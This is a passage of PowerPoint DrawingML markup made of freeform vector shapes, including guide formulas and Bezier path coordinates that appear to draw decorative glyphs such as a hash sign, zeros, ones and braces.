                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 62 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 219"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 219"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 122 w 189"/>
                  <a:gd name="T67" fmla="*/ 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9">
                    <a:moveTo>
                      <a:pt x="189" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 363"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 364"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769" y="1833"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 123 w 127"/>
                  <a:gd name="T3" fmla="*/ 144 h 203"/>
                  <a:gd name="T4" fmla="*/ 110 w 127"/>
                  <a:gd name="T5" fmla="*/ 177 h 203"/>
                  <a:gd name="T6" fmla="*/ 90 w 127"/>
                  <a:gd name="T7" fmla="*/ 196 h 203"/>
                  <a:gd name="T8" fmla="*/ 62 w 127"/>
                  <a:gd name="T9" fmla="*/ 203 h 203"/>
                  <a:gd name="T10" fmla="*/ 35 w 127"/>
                  <a:gd name="T11" fmla="*/ 197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5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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="201"/>
                      <a:pt x="72" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="21" y="186"/>
                      <a:pt x="16" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="4" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="89"/>
                      <a:pt x="1" y="73"/>
                      <a:pt x="4" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="47"/>
                      <a:pt x="11" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="18"/>
                      <a:pt x="29" y="12"/>
                      <a:pt x="37" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="3"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="0"/>
                      <a:pt x="127" y="34"/>
                      <a:pt x="127" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="104" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="47"/>
                      <a:pt x="91" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="158"/>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Freeform 365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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Freeform 366"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114" y="1833"/>
                <a:ext cx="156" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 128 w 128"/>
                  <a:gd name="T1" fmla="*/ 101 h 203"/>
                  <a:gd name="T2" fmla="*/ 124 w 128"/>
                  <a:gd name="T3" fmla="*/ 144 h 203"/>
                  <a:gd name="T4" fmla="*/ 111 w 128"/>
                  <a:gd name="T5" fmla="*/ 177 h 203"/>
                  <a:gd name="T6" fmla="*/ 90 w 128"/>
                  <a:gd name="T7" fmla="*/ 196 h 203"/>
                  <a:gd name="T8" fmla="*/ 62 w 128"/>
                  <a:gd name="T9" fmla="*/ 203 h 203"/>
                  <a:gd name="T10" fmla="*/ 36 w 128"/>
                  <a:gd name="T11" fmla="*/ 197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5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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="185"/>
                      <a:pt x="98" y="192"/>
                      <a:pt x="90" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="201"/>
                      <a:pt x="73" y="203"/>
                      <a:pt x="62" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="203"/>
                      <a:pt x="44" y="201"/>
                      <a:pt x="36" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="192"/>
                      <a:pt x="22" y="186"/>
                      <a:pt x="17" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="169"/>
                      <a:pt x="7" y="159"/>
                      <a:pt x="5" y="147"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="135"/>
                      <a:pt x="0" y="121"/>
                      <a:pt x="0" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="89"/>
                      <a:pt x="2" y="73"/>
                      <a:pt x="5" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="47"/>
                      <a:pt x="12" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="3"/>
                      <a:pt x="56" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="0"/>
                      <a:pt x="128" y="34"/>
                      <a:pt x="128" y="101"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="105" y="103"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="47"/>
                      <a:pt x="92" y="19"/>
                      <a:pt x="65" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="19"/>
                      <a:pt x="23" y="48"/>
                      <a:pt x="23" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="158"/>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Freeform 367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312" y="183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5 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 67"/>
                  <a:gd name="T15" fmla="*/ 32 h 201"/>
                  <a:gd name="T16" fmla="*/ 15 w 67"/>
                  <a:gd name="T17" fmla="*/ 26 h 201"/>
                  <a:gd name="T18" fmla="*/ 31 w 67"/>
                  <a:gd name="T19" fmla="*/ 19 h 201"/>
                  <a:gd name="T20" fmla="*/ 47 w 67"/>
                  <a:gd name="T21" fmla="*/ 10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40"/>
                      <a:pt x="30" y="42"/>
                      <a:pt x="26" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="31"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="15" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="26" y="21"/>
                      <a:pt x="31" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="10"/>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Freeform 368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="1838"/>
                <a:ext cx="76" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 240 h 240"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 198 h 240"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 157 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 128 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 112 h 240"/>
                  <a:gd name="T10" fmla="*/ 21 w 63"/>
                  <a:gd name="T11" fmla="*/ 83 h 240"/>
                  <a:gd name="T12" fmla="*/ 21 w 63"/>
                  <a:gd name="T13" fmla="*/ 43 h 240"/>
                  <a:gd name="T14" fmla="*/ 63 w 63"/>
                  <a:gd name="T15" fmla="*/ 0 h 240"/>
                  <a:gd name="T16" fmla="*/ 63 w 63"/>
                  <a:gd name="T17" fmla="*/ 17 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 42 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 42 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 195 h 240"/>
                  <a:gd name="T30" fmla="*/ 47 w 63"/>
                  <a:gd name="T31" fmla="*/ 216 h 240"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 223 h 240"/>
                  <a:gd name="T34" fmla="*/ 63 w 63"/>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240"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="240"/>
                      <a:pt x="21" y="226"/>
                      <a:pt x="21" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="157"/>
                      <a:pt x="21" y="157"/>
                      <a:pt x="21" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="138"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                      <a:pt x="0" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="111"/>
                      <a:pt x="21" y="101"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="14"/>
                      <a:pt x="35" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="17"/>
                      <a:pt x="63" y="17"/>
                      <a:pt x="63" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="18"/>
                      <a:pt x="42" y="27"/>
                      <a:pt x="42" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                      <a:pt x="42" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="103"/>
                      <a:pt x="35" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="124"/>
                      <a:pt x="42" y="136"/>
                      <a:pt x="42" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="47" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="63" y="223"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63"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369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="1838"/>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5 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 83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8" y="129"/>
                      <a:pt x="41" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="27"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="101"/>
                      <a:pt x="48"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Freeform 370"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669" y="183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5 h 201"/>
                  <a:gd name="T14" fmla="*/ 0 w 68"/>
                  <a:gd name="T15" fmla="*/ 32 h 201"/>
                  <a:gd name="T16" fmla="*/ 15 w 68"/>
                  <a:gd name="T17" fmla="*/ 26 h 201"/>
                  <a:gd name="T18" fmla="*/ 32 w 68"/>
                  <a:gd name="T19" fmla="*/ 19 h 201"/>
                  <a:gd name="T20" fmla="*/ 47 w 68"/>
                  <a:gd name="T21" fmla="*/ 10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40"/>
                      <a:pt x="31" y="42"/>
                      <a:pt x="26" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="13" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="52"/>
                      <a:pt x="4" y="53"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="15" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="26" y="21"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="10"/>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Freeform 371"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="182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4 h 209"/>
                  <a:gd name="T16" fmla="*/ 46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1 h 209"/>
                  <a:gd name="T52" fmla="*/ 45 w 179"/>
                  <a:gd name="T53" fmla="*/ 140 h 209"/>
                  <a:gd name="T54" fmla="*/ 38 w 179"/>
                  <a:gd name="T55" fmla="*/ 121 h 209"/>
                  <a:gd name="T56" fmla="*/ 40 w 179"/>
                  <a:gd name="T57" fmla="*/ 143 h 209"/>
                  <a:gd name="T58" fmla="*/ 64 w 179"/>
                  <a:gd name="T59" fmla="*/ 178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7 w 179"/>
                  <a:gd name="T71" fmla="*/ 146 h 209"/>
                  <a:gd name="T72" fmla="*/ 126 w 179"/>
                  <a:gd name="T73" fmla="*/ 92 h 209"/>
                  <a:gd name="T74" fmla="*/ 128 w 179"/>
                  <a:gd name="T75" fmla="*/ 135 h 209"/>
                  <a:gd name="T76" fmla="*/ 117 w 179"/>
                  <a:gd name="T77" fmla="*/ 94 h 209"/>
                  <a:gd name="T78" fmla="*/ 104 w 179"/>
                  <a:gd name="T79" fmla="*/ 54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8 h 209"/>
                  <a:gd name="T100" fmla="*/ 72 w 179"/>
                  <a:gd name="T101" fmla="*/ 40 h 209"/>
                  <a:gd name="T102" fmla="*/ 73 w 179"/>
                  <a:gd name="T103" fmla="*/ 45 h 209"/>
                  <a:gd name="T104" fmla="*/ 99 w 179"/>
                  <a:gd name="T105" fmla="*/ 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9"/>
                      <a:pt x="163" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164" y="165"/>
                      <a:pt x="167" y="169"/>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9"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
